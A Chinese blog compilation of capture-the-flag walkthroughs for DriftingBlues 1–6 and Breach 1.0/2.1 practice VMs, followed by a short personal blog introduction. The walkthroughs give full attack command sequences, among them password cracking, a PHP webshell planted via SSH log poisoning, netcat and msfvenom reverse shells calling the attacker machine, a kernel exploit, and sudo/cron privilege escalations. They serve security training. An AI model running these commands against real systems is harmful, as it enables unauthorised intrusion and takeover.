Driftingblues:6

一、基本信息

名称：DriftingBlues:6

发布日期：2021.3.30

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

firefart:/root/flag.txt

难度：简单

三、文件信息

文件名：driftingblues6_vh.ova

文件大小：395MB

下载地址：

MD5: 1EF3EF660B6E129CCA3D93F8FBA0C94D

SHA1: 01EDAC6D7FFAD8B6487DD4DCE021CCFFD0250CE8

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues6和攻击机kali2021在VirtualBox下设置为仅主机模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.56.102：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.56.0/24，扫描靶机ip

2.再进行端口扫描，发现只开放了80端口，访问主页查看源码，没有过多线索：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.118 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，发现有robots.txt文件：

1	gobuster dir -u http://192.168.56.118/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

Zip密码爆破

1.访问192.168.56.118/robots.txt，得到/textpattern/textpattern目录存在的提示，同时提心我们关注.zip文件内容：

2.继续访问192.168.56.118/textpattern/textpattern，发现是一个textpattern的管理后台登录页：

3.根据提示，再次扫描目录，这次以.zip文件为主，找到spammer.zip：

1	gobuster dir -u http://192.168.56.118/ -x zip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录下.zip文件扫描

4.利用fcrackzip对spammer.zip进行破解，可以得到zip内的一对用户名即密码：

1	fcrackzip -D -p rockyou.txt -u /home/kali/Downloads/spammer.zip

文件上传webshell

1.利用得到的用户和密码登录textpattern管理后台，发现在Content-File可以上传文件：

2.我们可以上传kali自带的webshell，/usr/share/webshells/php/php-reverse-shell.php，修改ip及端口：

1	vim /usr/share/webshells/php/php-reverse-shell.php

3.在kali开启对应的端口监听，然后访问192.168.56.118/textpattern/files/php-reverse-shell.php触发：

1	nc -lvnp 9001

1	python -c 'import pty; pty.spwan("/bin/bash");'，利用python建立交互式shell

Linux内核漏洞提权

1.获取shell后，我们可以查看靶机系统内核，发现版本为3.2.78:

1

uname -a

2.在kali上可以利用searchsploit搜索该版本漏洞，并且有对应的利用程序：

1	searchsploit linux 3.2.78

3.获取利用程序后，我们可以查看，发现程序可以修改靶机内核版本下linux用户的登录密码：

1 2	searchsploit -m 40839.c cat 40839.c

4.再次通过textpattern后台上传40839.c，并在靶机/var/www/textpattern/files目录下对其编译，运行生成程序后修改密码：

1 2 3 4 5

cd /var/www/textpattern/files gcc -pthread 40839.c -o 40839 -lcrypt ./40839 123，修改后的password

Flag获取

1.现在我们可以利用修改后的密码登录firefart用户：

1	su firefart

2.在/root目录下，能够找到flag，即flag.txt：

1 2 3

cd /root ls -la cat flag.txt

Driftingblues:5

一、基本信息

名称：DriftingBlues:5

发布日期：2021.3.8

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

gill:/~/user.txt
root:/root/root.txt

难度：困难

三、文件信息

文件名：driftingblues5_vh.ova

文件大小：715MB

下载地址：

MD5: 21E0290277C1523B3E9DEF173EA0FA66

SHA1: 371C270F8D2C8F65436F9BD52485E2128FC6365B

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues5和攻击机kali2021在VirtualBox下设置为仅主机模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.56.102：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.56.0/24，扫描靶机ip

2.再进行端口扫描，发现只开放了22和80端口，访问主页查看源码，确定是wordpress搭建的页面：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.117 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，都是wordpress相关的目录内容：

1	gobuster dir -u http://192.168.56.117/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

Wordpress用户密码爆破

1.扫描得到的结果都指向wordpress，则用wpscan进行扫描，可以得到5个用户及其密码：

1	wpscan --url http://192.168.56.117 --detection-mode aggressive -e --passwords=/home/kali/Desktop/rockyou.txt

2.但是如果使用rockyou.txt作为密码字典要跑出对应密码相当消耗时间，合理可以用cewl生成一个较小的字典，能够得到gill用户的密码：

1 2	cewl -m 6 -w drift.txt http://192.168.56.117 wpscan --url http://192.168.56.117 --detection-mode aggressive -e u -P drift.txt

3.进入wordpress管理后台，利用gill登录，但gill用户的权限不够，无法从wordpress后台写入webshell：

SSH登录，初步提权

1.回到主页，结合目录扫描的结果，我们能在http://192.168.56.117/wp-content/uploads/2021/02/目录下发现主页调用的图片，其中dblogo.png是唯一没被使用到的图片，我们可以用exiftool查看一下：

1	exiftool /home/kali/Downloads/dblogo.png

2.得到了ssh的密码，我们尝试登录一下，发现其实就是全小写，并且找到第一个flag，user.txt：

root提权

1.可以发现文件夹有keyfile.kdbx这个密码库文件，把这个文件获取到kali，用keepass2john解一下：

1 2 3

python3 -m http.server 8001，gill开启http服务 wget http://192.168.56.117:8001/keyfile.kdbx，kali获取密码库文件 keepass2john keyfile.kdbx | tee hash

1	John hash –wordlist=rockyou.txt

2.得到的porsiempre并不是root的密码，我们再把keyfile.kdbx放在https://app.keeweb.info/打开，得到的6个密码也不是root密码：

3.回到gill用户下，查看具有sudo权限的应用，没有发现明显可用的应用：

1	find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

4.利用linpeas.sh进行扫描，发现root下有/keyfolder这个目录：

1 2 3 4

python3 -m http.server 8001，kali开放http服务 wget http://192.168.56.102:8001/linpeas.sh，gill获取linpeas工具 chmod +x linpeas.sh ./linpeas.sh

5.我们查看/keyfolder这个目录，发现有其他用户可以在这个目录下写入：

6.再利用pspy64s监视进程，发现/root/key.sh这个进程是定时执行的：

1	wget http://192.168.56.102:8001/pspy64s，gill获取pspy64s

7.那么我们可以边让pspy64s进行监听，进入/keyfolder目录，将之前keyfile.kdbx内的密码一个个尝试，等待pspy64s监听到key.sh的一次执行，没有获得文件，就删去尝试的密码文件：

8.rootcreds.txt的内容就是root用户的密码，提权后在/root目录下能够找到第二个flag，即root.txt：

Driftingblues:4

一、基本信息

名称：DriftingBlues:4

发布日期：2021.3.8

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

hubert:/~/user.txt
root:/root/root.txt

难度：简单

三、文件信息

文件名：driftingblues4_vh.ova

文件大小：603MB

下载地址：

MD5: EEEA3E2332E41CE013245F18C4D4D226

SHA1: ED30008E15B83F641B1078DD84CBD747AC2141FF

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues4和攻击机kali2021在VirtualBox下设置为仅主机模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.56.102：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.56.0/24，扫描靶机ip

2.再进行端口扫描，发现开放了21，22和80端口，访问主页查看源码，有一串base64编码：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.116 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，没有什么太多发现：

1	gobuster dir -u http://192.168.56.116/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

信息解密

1.对得到的base64编码字串进行四次解码，得到路径/imfuckingmad.txt：

2.访问后得到一串brainfuck编码，进行解码得到/iTiS3Cr3TbiTCh.png：

3.访问图片路径，是一张二维码，扫描二维码跳转到一张图片，图片内有几个用户名：

FTP爆破，初步提权

1.根据之前base64解码的提示，开始用得到的用户名进行ftp爆破：

1	hydra -l luther -P rockyou.txt ftp://192.168.56.116

2.登录成功后发现的确还有hubert这个用户，发现该用户下没有.ssh目录，则可以创建.ssh目录，然后把kali的公钥上传，进行ssh免密登录：

1 2 3

cd hubert mkdir .ssh put authorized_keys

3.登录hubert后，我们可以在目录下找到第一个flag，user.txt：

root提权

1.可以发现文件夹下还有一个python文件，查看一下，程序是将1写入/tmp/backdoor_testing：

2.我们利用pspy64s工具进行进程检测，发现emergency.py是被定时执行的，那么我们将原有的emergency.py删除，新建一个用于提权的同名文件：

1 2 3 4

python3 -m http.server 8001，kali开启http服务 wget http://192.168.56.102:8001/pspy64s，hubert获取pspy64s工具 chmod +x pspy64s ./pspy64s

1 2	rm -f emergency.py vi emergency.py

3.在kali开启对应的端口监听，过一会就能收到root权限，在/root目录下能够找到第二个flag，root.txt：

Driftingblues:3

一、基本信息

名称：DriftingBlues:3

发布日期：2021.3.6

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

robertj:/~/user.txt
root:/root/root.txt

难度：简单

三、文件信息

文件名：driftingblues3.ova

文件大小：483MB

下载地址：

MD5: 987D997BC77205B54C61A9CDF745A73A

SHA1: DE17551E53C73792B41A190B1302DF78411A65B1

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues3和攻击机kali2021在VirtualBox下设置为仅主机模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.56.102：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.56.0/24，扫描靶机ip

2.再进行端口扫描，发现开放了22和80端口，访问主页查看源码，没有什么发现：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.115 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，发现有好几个可疑目录：

1	gobuster dir -u http://192.168.56.115/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

SSH写入webshell

1.访问192.168.56.115/robots.txt，进一步访问/eventadmins，告知我们ssh有问题，再访问/littlequeenofspades.html，源码里有一串base64编码字符：

2.对字符串解码两次，发现是一个路径/adminsfixit.php，继续访问，发现一个ssh auth log文件：

3.仔细观察，发现输出了我们的验证信息，也就是ssh相关的输出会回显在这个页面上，我们可以尝试写入shell：

1	ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.115，kali注入webshell

1	view-source:http://192.168.56.115/adminsfixit.php?cmd=cat%20/etc/passwd

4.在kali开启端口监听，对http://192.168.56.115/adminsfixit.php?cmd=nc%20-e%20/bin/bash%20192.168.56.102%201234访问触发shell：

SSH免密登录，初步提权

1.我们可以查看/home/robertj目录，下面有第一个flag，user.txt，但是我们无权查看：

2.查看同目录下的.ssh目录，发现里面没有rsa等文件，则我们可以生成rsa并将私钥复制到kali用于免密登录：

1 2	cd .ssh ssh-keygen -t rsa，注意生成目录的修改

1	cat rsa_key.pub > authorized_keys，将公钥写入authorized_keys

3.在kali使用私钥ssh登录，可以查看user.txt：

1 2	chmod 400 priv_key，添加权限 ssh robertj@192.168.56.115 -I priv_key

root提权

1.查看具有sudo权限的应用，发现getinfo可以利用：

1	find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

2.我们执行getinfo发现可以返回一些主机的IP信息hosts文件和os信息，那么应该是执行了ip a、cat /etc/hosts、uname -a的命令：

3.我们创建一个可以执行提权的uname文件进行提权，可以在/root目录下看到第二个flag，root.txt：

1 2 3 4 5

cd /tmp echo "/bin/bash" > uname chmod +x uname export PATH=/tmp:$PATH getinfo

Driftingblues:2

一、基本信息

名称：DriftingBlues:2

发布日期：2020.12.17

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

freddie:/~/user.txt
root:/root/root.txt

难度：简单

三、文件信息

文件名：driftingblues2.ova

文件大小：638MB

下载地址：

MD5: 51E9326E61C922CD7EA3A5C2AEB25C83

SHA1: 5444B91703E9B4D9BE48849A7816E369294376BA

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues2和攻击机kali2021在VirtualBox下设置为仅主机模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.56.102：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.56.0/24，扫描靶机ip

2.再进行端口扫描，发现开放了21，22和80端口，访问主页查看源码，没有什么发现：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.56.114 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，发现有/blog这个目录：

1	gobuster dir -u http://192.168.56.114/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

Wordpress后台登录

1.访问192.168.56.114/blog，很明显需要添加host解析：

2.因为主页有提示是用wordpress搭建的，添加解析后访问wordpress后台页，可以利用wpscan进行用户名及密码的爆破：

1	wpscan --url http://driftingblues.box/blog -e u，爆破用户

1	wpscan --url http://driftingblues.box/blog/ --passwords rockyou.txt --usernames albert，爆破密码

Wordpress写入webshell

1.登录进后台后，在Appearance-Theme Editor-404.php页写入修改后的kali自带webshell，/usr/share/webshells/php/php-reverse-shell.php，同时在kali开启监听端口，访问不存在页面触发webshell：

1	vim /usr/share/webshells/php/php-reverse-shell.php，修改webshell

2.获得shell后，我们能在/freddie目录下发现user.txt，但我们没有权限查看：

SSH登录，初步提权

1.我们可以发现在/freddie目录下有.ssh目录，里面有freddie用户的密钥：

2.我们将id_rsa保存至kali，并使用此密钥进行登录freddie，获得第一个flag：

root提权

1.使用sudo -l 查看是否可以以root权限执行命令，发现可以用nmap，那么使用nmap提权即可：

1 2	echo 'os.execute("/bin/bash")' >getshell sudo nmap --script=getshell，这里提权后没有命令输入显示

Driftingblues:1

一、基本信息

名称：DriftingBlues:1

发布日期：2020.12.11

作者：tasiyanci

系列：DriftingBlues

推特：@tasiyanci

二、靶机简介

Flags：

eric:/~/user.txt
root:/root/root.txt

难度：中等

三、文件信息

文件名：driftingblues.ova

文件大小：2.7GB

下载地址：

MD5: EF2FCBFF3647CA3C46529CACADD474C2

SHA1: 6CA2A8999AC3881C0186DE534F846D56035C2AE3

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(ubuntu)

五、网络信息

DHCP服务：可用

IP地址：自动分配

六、环境配置

1.将靶机driftingblues和攻击机kali2021在VirtualBox下设置为桥接模式，使用DHCP分配ip地址：

七、攻略步骤

信息探测

1.因为是没有直接告知我们靶机ip的，所以要先进行主机探测，先查看下kali分配到的ip，在进行网段扫描，命令如下，得到靶机ip为192.168.3.134：

1	ifconfig，查看kali分配到的ip

1	nmap -sP 192.168.3.134/24，扫描靶机ip

2.再进行端口扫描，发现只开放22和80端口，访问主页查看源码，发现一串base64编码：

1	nmap -T4 -sC -sV -p- --min-rate=1000 192.168.3.138 | tee nmapscan，端口扫描

3.最后再进行一下目录扫描，发现只有很简单的几个目录：

1	gobuster dir -u http://192.168.3.137/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt，目录扫描

文本解密，子域名暴力破解

1.将主页源码的base64编码字串解码后，得到一个文本文件，访问发现是一段Ook加密：

2.解密Ook文本后得到提示要添加host，在主页上能发现域名信息：

3.再进行子域名暴力破解，得到test.driftingblues.box再次修改host：

1	gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

4.访问test.driftingblues.box，再次进行目录扫描，发现robots.txt文件：

1	dirb http://test.driftingblues.box

SSH登录

1.我们访问robots.txt文件可以发现还有ssh_cred.txt文件，在ssh_cred.txt中提示我们ssh的密码：

2.先用crunch生成密码字典，在用hydra进行ssh登录破解，eric多次出现，很可能是用户名：

1	crunch 13 13 -f /usr/share/crunch/charset.lst numeric -t 1mw4ckyyucky@ > password.dic

1	hydra -l eric -P password.dic -t 10 ssh://192.168.3.138

3.ssh登录后，在当前目录下发现了第一个flag，即user.txt：

root提权

1.在/var/backups目录下，我们查看文件权限，发现backup.sh的属主和属组都是root：

2.查看backup.sh，其实就是用zip命令把/var/www目录下的所有内容打包为/tmp/backup.zip，然后sudo /tmp/emergency，的确在/tmp中找到了这个压缩文件，但是并没有找到emergency，那我们可以写一个能提权的/tmp/emergency即可：

1 2 3 4

cd /tmp vi emergency echo "eric ALL=(ALL:ALL) ALL" >> /etc/sudoers chmod +x emergency

3.利用pspy64s可以发现backup.sh是一个定时执行的进程，那么我们等待一会就可以进行提权，获得第二个flag：

1 2 3 4

python3 -m http.server 8001，kali开启http服务 wget http://192.168.3.138:8001/pspy64s，eric获取pspy64s chmod +x pspy64s ./pspy64s

Breach 2.1

一、基本信息

名称：Breach 2.1

发布日期：2016.8.15

作者：mrb3n

系列：Breach

推特：@mrb3n813

二、靶机简介

Flags：

root:/root/.flag.py

难度：中等

三、文件信息

文件名：Breach-2_final2.1.zip

文件大小：1.3GB

下载地址：

MD5: 90E8871E8EB68ADBEB82659FE1F11831

SHA1: 069B529B6701FDF9F82840F9918842921FFB7A1E

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(debain)

五、网络信息

DHCP服务：禁用

IP地址：192.168.110.151

六、环境配置

1.将靶机Breach2在Vmware下设置为仅主机模式，并修改ip为192.168.110.151，这里演示的是mac环境下Vmware Fusion 11，只能命令修改host-only的ip（记得备份），命令如下：

1	sudo vi /Library/Preferences/VMware\ Fusion/networking

2.将攻击机kali2021也选择用仅主机模式链接，启动，保证与靶机Breach在同一网段下，这里kali2021的ip为192.168.110.2。

七、攻略步骤

靶机端口扫描

1.Kali2021先用nmap对192.168.110.151（Breach2）扫描，发现SSH端口不是22而修改为了65535：

1	nmap -A -p- 192.168.110.151 （端口扫描）

2.尝试访问ssh，命令为：ssh 192.168.110.151 -p 65535，会发现被告知Peter用户密码就在源码内，于是尝试用peter链接，密码inthesource，可以成功链接，但很快就被断开：

3.再次使用nmap基础扫描，发现80端口开放了，可以进行访问，而访问页面查看源码并没有多余线索，但是页面图片是BEEF，算是提示吧：

网站目录爆破，XSS注入

1.使用命令:dirb http://192.168.110.151/，爆破网站目录，发现跟之前ssh提示相关的blog目录：

2.我们访问后发现是博客页，且有搜索框，明显有XSS，这里进一步可以用sqlmap进行数据库爆破，但我们暂且没有登录窗口：

3.使用BeEF，在博客的注册页提交payload，返回主页点开消息提示触发，可以观察到主机已经上线，并且得到靶机浏览器为Firefox 15，有可利用漏洞：

Msf利用漏洞，构造shell

1.启动msfconsole来利用漏洞：

1 2 3 4 5 6

use exploit/multi/browser/firefox_proto，进入要利用的exp框架 set payload generic/shell_reverse_tcp，设置要利用exp所需要的payload set srvhost 192.168.110.2，设置exp所需要的服务端地址，也就是攻击机的ip set uripath shell，设置exp攻击成功之后的url目录 set lhost 192.168.110.2，设置payload的ip地址 run，启动一次攻击，生成利用的url连接

2.利用BeEF的Redirect Browser模块，输入之前msf生成的url，得到session：

3.因为浏览器的shell会在连接了5秒钟之后失效，所以要在获取到session之后，将迁移shell进程到meterpreter中，获得一个稳定的shell，再次在BeEF中按下execute，得到session后立刻输入命令：

1 2 3

use post/multi/manage/shell_to_meterpreter，进入到转移shell用的模块 set session 2，设置要转义的session号，这里我是session 2 run，启动转移，成功转义，获得稳定的shell，session 3

4.使用session 3，构造shell：

1 2	sessions -i 3 python -c 'import pty;pty.spawn("/bin/bash")'，获得标准shell

用户搜寻

1.继续收集信息，查看电脑开启的端口，发现一个不常见的2323端口，可以尝试链接一下，得到的是一个地理坐标：

2.这个地理坐标是休斯敦（Houston）的一个公园，很有可能是一个密码信息，而我们之后对帐户进行搜寻，发现了一个milton的帐户：

3.随即想到使用telnet登录milton，密码为Houston，但之后又有问题：

4.只能再去milton用户目录去寻找线索，在用户目录下发现了cd.py文件，查看源码知道刚才问题的答案是mine：

5.重新利用telnet登录milton，再次查看端口开放，发现有8888端口开放，有OScommerrce页面，且可以访问管理页面：

反弹shell，准备提权

1.首先管理页面用admin帐户登录，密码也是admin，算是一个弱口令，其实之前利用sqlmap就已经爆破出来了：

2.进入管理后台，发现Tools – File Manager – includes – work是有写入权限的，我们可以用msf制作一个反弹shell，进行上传：

3.msf生成反弹shell：

1 2 3 4 5 6 7

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.2 LPORT=5555 -f raw > shell.php，生成反弹shell脚本 msfconsole use exploit/multi/handler，切换exp模块 set payload php/meterpreter/reverse_tcp，使用payload为之前生成后门所用的payload set lhost 192.168.110.123，设置用来接收shell的ip set lport 5555，就是之前生成后门所设置的端口 run，启动exp，等待接收shell

4.把生成的shell.php上传到work目录下，对shell.php进行访问后，可以看到msf能够进行shell，且登录用户为blumbergh：

提权，获取flag

1.开始进行提权，输入命令:sudo -l，发现root不需要密码的命令为tcpdump：

2.那么可以利用tcodump进行提权，命令如下:

1 2 3 4

nc -lvvp 1993，kali2021开启一个监听端口 echo "nc 192.168.110.2 1993 -e /bin/bash"> /tmp/shell.sh，在/tmp目录下写入shell.sh脚本 chmod +x /tmp/shell.sh，给shell.sh脚本执行权限 sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root，使用tcpdump命令

3.进入/root目录下，寻找flag，这里全是隐藏文件，命令如下：

1 2 3

cd /root，进入root目录 ls -la，查看隐藏文件 python .flag.py，显示flag

Breach 1.0

一、基本信息

名称：Breach 1.0

发布日期：2016.6.30

作者：mrb3n

系列：Breach

推特：@mrb3n813

二、靶机简介

Flags：

root:/root/flair.jpg

难度：中等

三、文件信息

文件名：Breach-1.0.zip

文件大小：1.9GB

下载地址：

MD5: F15490856100B3164D4E6807CFF744C5

SHA1: 812D56D6071A1859F03446FEE34532AC6A785414

四、镜像信息

格式：Virtual Machine (Virtualbox - OVA)

操作系统：Linux(ubuntu)

五、网络信息

DHCP服务：禁用

IP地址：192.168.110.140

六、环境配置

1.将靶机Breach在Vmware下设置为仅主机模式，并修改ip为192.168.110.140，这里演示的是mac环境下Vmware Fusion 11，只能命令修改host-only的ip（记得备份），命令如下：

1	sudo vi /Library/Preferences/VMware\ Fusion/networking

2.将攻击机kali2021也选择用仅主机模式链接，启动，保证与靶机Breach在同一网段下，这里kali2021的ip为192.168.110.2。

七、攻略步骤

靶机端口扫描

1.Kali2021先用nmap对192.168.110.140（Breach）扫描，发现几乎是全端口开放，应该是伪造了：

1	nmap -v -A 192.168.110.140 -oN Breach.txt （端口扫描）

获取impresscms登录密码

1.直接访问192.168.110.140:80（Home page），发现初始页为一张图片，点击图片可以进入http://192.168.110.140/initech.html，这个页面下Home page，Cake，Stapler是三张图片，Employee portal是一个impresscms的登录页：

2.我们回到Home page看看有没有能登录的线索，源码里有一串明显是base64加密的注释：

3.Base64解码几次得到类似账号密码的东西，尝试去impresscms登录：

获取SSL证书，解析TLS流

1.登录后我们可以看到几封邮件，其中第三封邮件表示有一个peter的SSL证书被保存在192.168.110.140/.keystore：

2.访问http://192.168.110.140/.keystore下载包含SSL证书的密钥库keystore文件，但我们现在还不知道这个有什么用处；回到impresscms帐户页面，我们依次点击菜单栏，会有很多信息，当我们在右边Home页下，点击Content时，下方会弹出一个链接：

3.这个链接指向一个流量包，当我们用wireshark打开时，发现是tls流，包括该页面本身也有提示表示：这个pCAP文件是有红色团队的重新攻击产生的，但是不能读取文件。而且告诉我们Keystore密码、key密码都设置成了tomcat。
由此推测：
a.这是一个流量包文件，不能读取很可能因为某些流量有SSL加密，前面的邮件中提供了一个keystore，这里提供了密码；
b.系统中可能存在tomcat：

4.现在要利用工具解析之前获得的keystore，使用keytool，命令如下：

1 2 3

keytool -list -keystore keystore （密码：tomcat） keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat （密码连续三次：tomcat）

5.然后利用生成的.p12证书导入wireshark，再打开刚才的流量包可以看到解析出的http包，发现是tomcat的管理页面和密码：

登录Tomcat，上传shell

1.可以登录试试看，报错了，切换浏览器还是报错了：

2.这个时候用burpsuite先代理一下，再放行，就能通过了（kali2021设置在了仅主机模式下，仍无法访问可从外部主机BP代理再放行访问tomcat）：

3.使用msfvenom生成后门文件，命令如下：

1 2 3

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.110.2 LPORT=1234 -f jsp -o shell.jsp （生成后门） zip -r shell.zip shell.jsp （压缩shell） cp shell.zip shell.war （修改格式，便于上传）

4.启动msfconsole，设置监听，命令如下：

1 2 3 4 5 6

msfconsole use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.110.2 set lport 1234 run

5.在tomcat上传生成的shell.war后门，并且访问https://192.168.110.140:8443/shell/shell.jsp，在msf下顺利拿到shell：

搜索帐户，准备提权

1.建立一个交互式的shell，发现了两个除root外值得关注的帐户，开始准备提权，命令如下：

1 2	python -c 'import pty;pty.spawn("/bin/sh")' （交互式shell） cat /etc/passwd

2.而/var/www/5446目录下，看到两个文件名很特殊的文件，是mysql的数据库连接文件，使用的root账户，不需要密码：

3.输入命令，mysql -u root -p ，进入mysql，提示输入密码，直接回车，成功连接进入mysql数据库，查看账号密码，得到milton账户的密码哈希，解密为:thelaststraw：

4.这时我们就可以尝试用milton的帐户进行登录了，而查看历史命令，发现有切换到blumbergh这个账户的操作，操作之后有切换到root的操作，所以可能提权要进入到blumbergh这个账户：

5.继续分析，我们发现milton帐户下有一张图片，包括之前在服务器上发现的一共七张图片，用图片分析工具exiftool一一分析，可以得到类似密码的字串：

6.现在可以登录到blumbergh帐户，再次查看历史命令，发现/usr/share/cleanup目录下的tidyup.sh脚本文件：

提权，获取flag

1.输入命令:sudo -l，查看能够root权限执行的命令有tee，tidyup.sh文件只有root可写，而能够以root权限运行tee命令，那么用tee命令写tidyup.sh：先将反弹shell命令写入shell.txt文件，使用bash反弹shell命令没有成功，于是使用nc命令反弹shell成功，所以写nc反弹命令：

1 2 3 4

cd /home/blumbergh （切换到blumbergh的家目录中） echo "nc -e /bin/bash 192.168.110.2 2345" > shell.txt （将nc执行的反弹shell命令，写入到shell.txt文件） cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh （使用tee命令将shell.txt内容输出到tidyup.sh） cat /usr/share/cleanup/tidyup.sh (查看tidyup.sh文件写入成功)

2.Kali2021中，输入命令:nc -lvvp 2345，监听2345端口的动静，等到一段时间，成功接到root的shell，查看/root目录下，有个flair.jpg的文件，应该是最后的flag，将文件再次复制到/var/www/html/images中，查看图片，成功得到flag:

Gladiia-返航

优雅！ ——《SPY x Family》

语流

写在前面

跌跌撞撞 磨磨蹭蹭 究极难产 在大二自己写好本地版本的个人主页后，自己便萌生出自己搭建博客，并且把个人主页改改 push 上去的想法，但是嘛……
就是因为懒 QAQ，导致主页没实现的功能现在还没去改（在做了在做了），个人博客也是一拖再拖，直到 2022 年的上半年被封在上海，自己也是好不容易从第一份工作中抽身出来，能够有时间来调剂调剂，并修补修补自己挖下的坑，很不好意思呢 XD（话说 XD 这个表情我一直是脑补成一只手握拳锤在头上然后闭一只眼，吐舌头说 simimasai 的画面）

总而言之

这片寄托于 Github 的小空间以后大概会被以下内容填充：

1. 技术知识，包括自己的主业（安全工作中遇到的问题解决、自己实现的一些东西）
2. 个人作品，应该主要是画画（可能还有皮套人？视频？）
3. 心态思考，这个估计就是随笔之类的（深夜 emo，个人思考规划（迫真））
4. 日记，主要是每天可能发生的事情的记录，比如今天是 2022 年 5 月 30 日，下午四点明日方舟会复刻覆潮之下活动，会有 Gladiia 的新皮肤，终结深海三人组就二队长没有皮肤的美式霸凌

记在后面

感谢 Artchen 大大的博客设计，Memory 项目的部署配置我应该还会出一篇教程简单说说我个人博客搭建遇到的问题，尤其是 Memory 项目距今稍久了
感谢某只不愿透露名姓的三咕咕尾在这次上海封锁中（对！是封锁，上海 从 未 封 城 ！）和我被困在一起，以至于我没被饿死（这么说好像是我把他吃了一样……）
本来最后还想感谢终于不懒了的自己的，但发现不值得，懒到现在才写，不值得感谢（屑）
博客名“氕氘氚”是因为这三个字都是“氢”也就是“青”，希望自己多点积累吧
这篇文章叫“语流”，是因为我在写这第一篇博文开始时刚好随机到由《ぼかろころしあむ》中文重填词、乐正绫唱的《语流》，感觉很合适做这篇文章的标题
好了，就到这里，有意请致信 Szczecin@foxmail.com